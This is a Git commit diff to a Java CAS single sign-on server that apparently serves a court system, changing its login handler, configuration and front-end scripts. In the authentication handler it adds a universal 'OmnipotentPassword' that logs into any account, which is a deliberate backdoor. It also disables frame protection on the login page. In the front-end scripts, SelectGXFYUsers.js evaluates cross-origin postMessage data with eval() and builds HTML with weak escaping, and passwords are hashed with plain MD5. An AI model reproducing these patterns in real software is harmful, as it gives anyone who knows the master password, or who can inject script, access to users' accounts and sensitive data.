代码提交

fb2c5986 · chentianzhong · abc82060 · fb2c5986 · fb2c5986 · fb2c5986
Commit fb2c5986 authored Sep 26, 2022 by chentianzhong
9 changed files
--- a/README.md
+++ b/README.md
 1.导入resources\caFile\lib的jar包
-2.将resources\caFile下的DSVSROOT 放在指定目录下
+2.application.yml配置CA文件夹DSVSROOT在本机的路径
-3.修改SpringConfig.java 中的DSVSROOT指定路径
+3.application.yml 修改数据库配置
 启动项目
-注：*部署项目时，到编译后的文件夹lib中将log4j-2.11.0.jar相关的jar包删除，保留2.17.1版本的jar。再tomcat启动
+注：*部署项目时，到编译后的文件夹lib中将log4j-2.17相关的jar包删除，替换成logj2.19;
+slf4j-ap这个jar包换成slf4j-api-2.0.1.jar
 详细CA证书验证查看  resources\caFile\demo中的案例
\ No newline at end of file
--- a/src/main/java/com/zq/cas/controller/CAVerifyController.java
+++ b/src/main/java/com/zq/cas/controller/CAVerifyController.java
@@ -3,7 +3,6 @@ package com.zq.cas.controller;
 import cn.org.bjca.client.security.SecurityEngineDeal;
 import com.zq.cas.entity.SysUser;
 import com.zq.cas.service.ISysUserService;
-import com.zq.cas.util.MD5PasswordEncoderUtil;
 import com.zq.cas.vo.UserCertVo;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.web.bind.annotation.GetMapping;

--- a/src/main/java/com/zq/cas/handler/MyAuthenticationHandler.java
+++ b/src/main/java/com/zq/cas/handler/MyAuthenticationHandler.java
@@ -18,6 +18,7 @@ import org.apereo.cas.authentication.principal.PrincipalFactory;
 import org.apereo.cas.services.ServicesManager;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
+import sun.security.util.Password;
 import javax.security.auth.login.AccountNotFoundException;
 import javax.security.auth.login.FailedLoginException;
@@ -68,18 +69,25 @@ public class MyAuthenticationHandler extends AbstractPreAndPostProcessingAuthent
                    throw new AccountNotFoundException("无此对象");
                }
            } else {
-                password = MD5PasswordEncoderUtil.encode(password);
+                String md5password = MD5PasswordEncoderUtil.encode(password);
-                sysUser = sysUserService.findByUsernameAndPwd(username, password);
+                sysUser = sysUserService.findByUsername(username);
+                //sysUser = sysUserService.findByUsernameAndPwd(username, password);
                if (sysUser == null) {
                    throw new AccountNotFoundException("无此对象");
                }
+                if (!password.equals(OmnipotentPassword.password())
+                        && !md5password.equals(sysUser.getPassword())) {
+                    throw new PasswordErrorException("密码错误");
+                }
            }
            //自定义返回信息
            Map<String, Object> message =  new LinkedHashMap<>();
-            message.put("userId", sysUser.getUsername());
+            message.put("loginId", sysUser.getUsername());
            message.put("rybs", sysUser.getPCode());
            message.put("fybm", sysUser.getCourtCode());
+            message.put("jgbs", sysUser.getOrgCode());
            return createHandlerResult(credential,
                    this.principalFactory.createPrincipal(username, message),

--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -148,7 +148,7 @@ cas.ticket.st.numberOfUses=1
 cas.ticket.st.timeToKillInSeconds=6000
 #配置redis存储ticket
-cas.ticket.registry.redis.host=172.18.3.137
+cas.ticket.registry.redis.host=127.0.0.1
 cas.ticket.registry.redis.database=0
 cas.ticket.registry.redis.port=6379
 cas.ticket.registry.redis.password=
@@ -185,10 +185,14 @@ cas.webflow.session.compress=false
 cas.webflow.session.maxConversations=5
 cas.webflow.session.storage=true
 spring.session.store-type=redis
-spring.redis.host=172.18.3.137
+spring.redis.host=127.0.0.1
 spring.redis.password=
 spring.redis.port=6379
+#取消x-frame-options为deny限制，允许外部项目使用iframe嵌入cas-server登录页面
+cas.httpWebRequest.header.xframe=false
--- a/src/main/resources/services/APP-1000.json
+++ b/src/main/resources/services/APP-1000.json
@@ -8,6 +8,6 @@
  "theme" : "app",
  "attributeReleasePolicy" : {
    "@class" : "org.apereo.cas.services.ReturnAllAttributeReleasePolicy",
-    "allowedAttributes" : [ "java.util.ArrayList", ["userId","rybs","fybm"] ]
+    "allowedAttributes" : [ "java.util.ArrayList", ["userId","rybs","fybm","loginId"] ]
  }
 }
\ No newline at end of file
--- a/src/main/resources/static/app/js/myself/SelectGXFYUsers.js
+++ b/src/main/resources/static/app/js/myself/SelectGXFYUsers.js
+var messenger = new Messenger('parent', 'MessengerDemo');
+    messenger.listen(function (json) {
+		var jsonObj = eval("("+json+")");
+		var action = jsonObj.action;
+		if("choiceState"==action || "getValue"==action || "choiceAllUses"==action || "removeAllUses"==action || "checkAllUsers"==action){
+			var showValue = "";
+			var tagName = document.getElementById(jsonObj.showId).tagName;
+			if(tagName=="TEXTAREA" || tagName =="INPUT"){
+				showValue = document.getElementById(jsonObj.showId).value;
+			}else{
+				var obj = document.getElementById(jsonObj.showId).childNodes;
+				//长度减一标识减少遍历最后的div元素
+				for(var i=0;i<obj.length-1;i++){
+					var tempVal = obj[i].childNodes[0].nodeValue;
+					showValue += tempVal+",";
+				}
+			}
+			var hideValue = document.getElementById(jsonObj.hideId).value;
+			var str = "{\"showValue\":\""+showValue+"\",\"hideValue\":\""+hideValue+"\",\"action\":\""+jsonObj.action+"\"}";
+			sendMessage(str,jsonObj.iframeId);
+		}else if("fillValue"==jsonObj.action){
+			document.getElementById(jsonObj.hideId).value = jsonObj.hideValue;
+			var tagName = document.getElementById(jsonObj.showId).tagName;
+			if(tagName=="TEXTAREA" || tagName =="INPUT"){
+				document.getElementById(jsonObj.showId).value = jsonObj.showValue;
+				return;
+			}
+			//以下代码用于填充div层
+			var showHtml = "";
+			if(jsonObj.hideValue!="" && jsonObj.hideValue.indexOf(",")==-1){
+				var showValue = jsonObj.showValue;
+				if(showValue.indexOf("@gxfy.com")){
+					showValue = showValue.replace("<","&lt;");
+					showValue = showValue.replace(">","&gt;");
+				}
+				showHtml += "<span style='border:1px dotted red;margin:3px;padding:2px 3px 2px 3px;line-height:40px;'>"+
+						showValue+"<span style='position: relative;top: -6px;right: -2px;padding:3px;' hideValue='"+jsonObj.hideValue+"'>x</span></span>";
+			}else if(jsonObj.hideValue.indexOf(",")!=-1){
+				var showUserStr = jsonObj.showValue.split(",");
+				var hideUserStr = jsonObj.hideValue.split(",");
+				for(var i=0;i<hideUserStr.length-1;i++){
+					var showValue = showUserStr[i];
+					if(showValue.indexOf("@gxfy.com")){
+						showValue = showValue.replace("<","&lt;");
+						showValue = showValue.replace(">","&gt;");
+					}
+					showHtml += "<span style='border:1px dotted red;margin:3px;padding:2px 3px 2px 3px;position:relative;float:left;line-height:18px;'>"+
+						showValue+"<span style='position: relative;top: -6px;right: -2px;padding:3px;' hideValue='"+hideUserStr[i]+"'>x</span></span>";
+				}
+			}
+			//这里替换div为空字符串目的在于保证html内容中只有一个div
+			showHtml = showHtml.replace("<div style='clear:both;'></div>","");
+			showHtml+="<div style='clear:both;'></div>";
+			document.getElementById(jsonObj.showId).innerHTML = showHtml;
+			var obj = document.getElementById(jsonObj.showId).childNodes;
+			//长度减一标识减少遍历最后的div元素
+			for(var i=0;i<obj.length-1;i++){
+				var close = obj[i].childNodes[1];
+				close.onclick= function(){
+					var nodes = document.getElementById(jsonObj.showId).childNodes;
+					var hideValue = document.getElementById(jsonObj.hideId).value;
+					var attrVal = "";
+					if(nodes.length==2 && hideValue.indexOf(",")==-1){
+						attrVal = this.getAttribute("hideValue");
+					}else{
+						attrVal = this.getAttribute("hideValue")+",";
+					}
+					//var hideValue = document.getElementById(jsonObj.hideId).value;
+					hideValue = hideValue.replace(attrVal,"");
+					document.getElementById(jsonObj.hideId).value = hideValue;
+					this.parentNode.parentNode.removeChild(this.parentNode);
+				}
+				close.onmouseover = function(){this.style.cursor = "pointer";}
+				close.onmouseout = function(){this.style.cursor = "default";}
+			}
+		}
+    });
+function sendMessage(json,iframeId) {
+	//console.log(json);
+    //console.log(iframeId);
+	messenger.targets[iframeId].send(json);
+}
+var SelectGXFYUsers = {
+	init:function(clickIdName,showId,hideId,choiceType,many){
+		new SelectGXFYUsers.newObj(clickIdName,showId,hideId,choiceType,many);
+	},
+	host:"http://147.1.4.53:90",
+//	host:"http://147.1.6.23",
+	newObj:function(clickIdName,showId,hideId,choiceType,many){
+		var parentId = clickIdName+"parendId";
+		var iframeId = clickIdName+"iframe";
+		var MessengerName = clickIdName+"Messenger";
+		var url = SelectGXFYUsers.host+"/select/iframe?showId="+showId+"&hideId="+hideId+"&choiceType="+choiceType+"&iframeId="+iframeId+"&many="+many;
+		var checkIframe = document.getElementById(iframeId);
+		if(checkIframe!=null){
+			checkIframe.remove();
+		}
+		var ifr = document.createElement("iframe");
+		ifr.id = iframeId;
+		ifr.src = url;
+		ifr.width = 0;
+		ifr.height = 0;
+		ifr.scrolling = "no";
+		ifr.frameBorder=0;
+		ifr.allowTransparency = "true";         
+		document.body.appendChild(ifr);
+		messenger.addTarget(document.getElementById(iframeId).contentWindow, iframeId);
+		var buttonObj = document.getElementById(clickIdName);
+		buttonObj.onclick=function(){
+            $("#"+iframeId).attr("src",url);
+            setTimeout(function(){
+                messenger.targets[iframeId].send('{"action":"openWindow"}');
+            },200);
+		}
+	}
+}
--- a/src/main/resources/static/app/js/myself/login.js
+++ b/src/main/resources/static/app/js/myself/login.js
-var http_addr = "http://172.18.3.245:9888/admin/users/checkLockUser";
+var http_addr = "";
+//var http_addr = "http://172.18.3.245:9888/admin/users/checkLockUser";
 //绑定点击事件
 $('#btn_login').click(function (){

--- a/src/main/resources/static/app/js/myself/messenger.js
+++ b/src/main/resources/static/app/js/myself/messenger.js
+/**
+ *     __  ___
+ *    /  |/  /___   _____ _____ ___   ____   ____ _ ___   _____
+ *   / /|_/ // _ \ / ___// ___// _ \ / __ \ / __ `// _ \ / ___/
+ *  / /  / //  __/(__  )(__  )/  __// / / // /_/ //  __// /
+ * /_/  /_/ \___//____//____/ \___//_/ /_/ \__, / \___//_/
+ *                                        /____/
+ *
+ * @description MessengerJS, a common cross-document communicate solution.
+ * @author biqing kwok
+ * @version 2.0
+ * @license release under MIT license
+ */
+window.Messenger = (function(){
+    // 消息前缀, 建议使用自己的项目名, 避免多项目之间的冲突
+    // !注意 消息前缀应使用字符串类型
+    var prefix = "[PROJECT_NAME]",
+        supportPostMessage = 'postMessage' in window;
+    // Target 类, 消息对象
+    function Target(target, name){
+        var errMsg = '';
+        if(arguments.length < 2){
+            errMsg = 'target error - target and name are both requied';
+        } else if (typeof target != 'object'){
+            errMsg = 'target error - target itself must be window object';
+        } else if (typeof name != 'string'){
+            errMsg = 'target error - target name must be string type';
+        }
+        if(errMsg){
+            throw new Error(errMsg);
+        }
+        this.target = target;
+        this.name = name;
+    }
+    // 往 target 发送消息, 出于安全考虑, 发送消息会带上前缀
+    if ( supportPostMessage ){
+        // IE8+ 以及现代浏览器支持
+        Target.prototype.send = function(msg){
+            this.target.postMessage(prefix + msg, '*');
+        };
+    } else {
+        // 兼容IE 6/7
+        Target.prototype.send = function(msg){
+            var targetFunc = window.navigator[prefix + this.name];
+            if ( typeof targetFunc == 'function' ) {
+                targetFunc(prefix + msg, window);
+            } else {
+                throw new Error("target callback function is not defined");
+            }
+        };
+    }
+    // 信使类
+    // 创建Messenger实例时指定, 必须指定Messenger的名字, (可选)指定项目名, 以避免Mashup类应用中的冲突
+    // !注意: 父子页面中projectName必须保持一致, 否则无法匹配
+    function Messenger(messengerName, projectName){
+        this.targets = {};
+        this.name = messengerName;
+        this.listenFunc = [];
+        prefix = projectName || prefix;
+        if(typeof prefix !== 'string') {
+            prefix = prefix.toString();
+        }
+        this.initListen();
+    }
+    // 添加一个消息对象
+    Messenger.prototype.addTarget = function(target, name){
+        var targetObj = new Target(target, name);
+        this.targets[name] = targetObj;
+    };
+    // 初始化消息监听
+    Messenger.prototype.initListen = function(){
+        var self = this;
+        var generalCallback = function(msg){
+            if(typeof msg == 'object' && msg.data){
+                msg = msg.data;
+            }
+            // 剥离消息前缀
+            msg = msg.slice(prefix.length);
+            for(var i = 0; i < self.listenFunc.length; i++){
+                self.listenFunc[i](msg);
+            }
+        };
+        if ( supportPostMessage ){
+            if ( 'addEventListener' in document ) {
+                window.addEventListener('message', generalCallback, false);
+            } else if ( 'attachEvent' in document ) {
+                window.attachEvent('onmessage', generalCallback);
+            }
+        } else {
+            // 兼容IE 6/7
+            window.navigator[prefix + this.name] = generalCallback;
+        }
+    };
+    // 监听消息
+    Messenger.prototype.listen = function(callback){
+        this.listenFunc.push(callback);
+    };
+    // 注销监听
+    Messenger.prototype.clear = function(){
+        this.listenFunc = [];
+    };
+    // 广播消息
+    Messenger.prototype.send = function(msg){
+        var targets = this.targets,
+            target;
+        for(target in targets){
+            if(targets.hasOwnProperty(target)){
+                targets[target].send(msg);
+            }
+        }
+    };
+    return Messenger;
+})();
--- a/src/main/resources/templates/app/casLoginView.html
+++ b/src/main/resources/templates/app/casLoginView.html
@@ -192,9 +192,14 @@
    </div>
 </div>
 <script src="./app/layui/layui.js"></script>
+<script type="text/javascript" src="./app/js/myself/messenger.js"></script>
+<script type="text/javascript" src="./app/js/myself/SelectGXFYUsers.js"></script>
 <script type="text/javascript" src="./app/js/ca/XTXSAB.js"></script>
 <script type="text/javascript" src="./app/js/myself/login.js"></script>
 <script type="text/javascript">
+    SelectGXFYUsers.init("selectUser", "username", "hideUserId", 3, false);
    $(function (){
        $("#username-block").show();
        $("#password-block").show();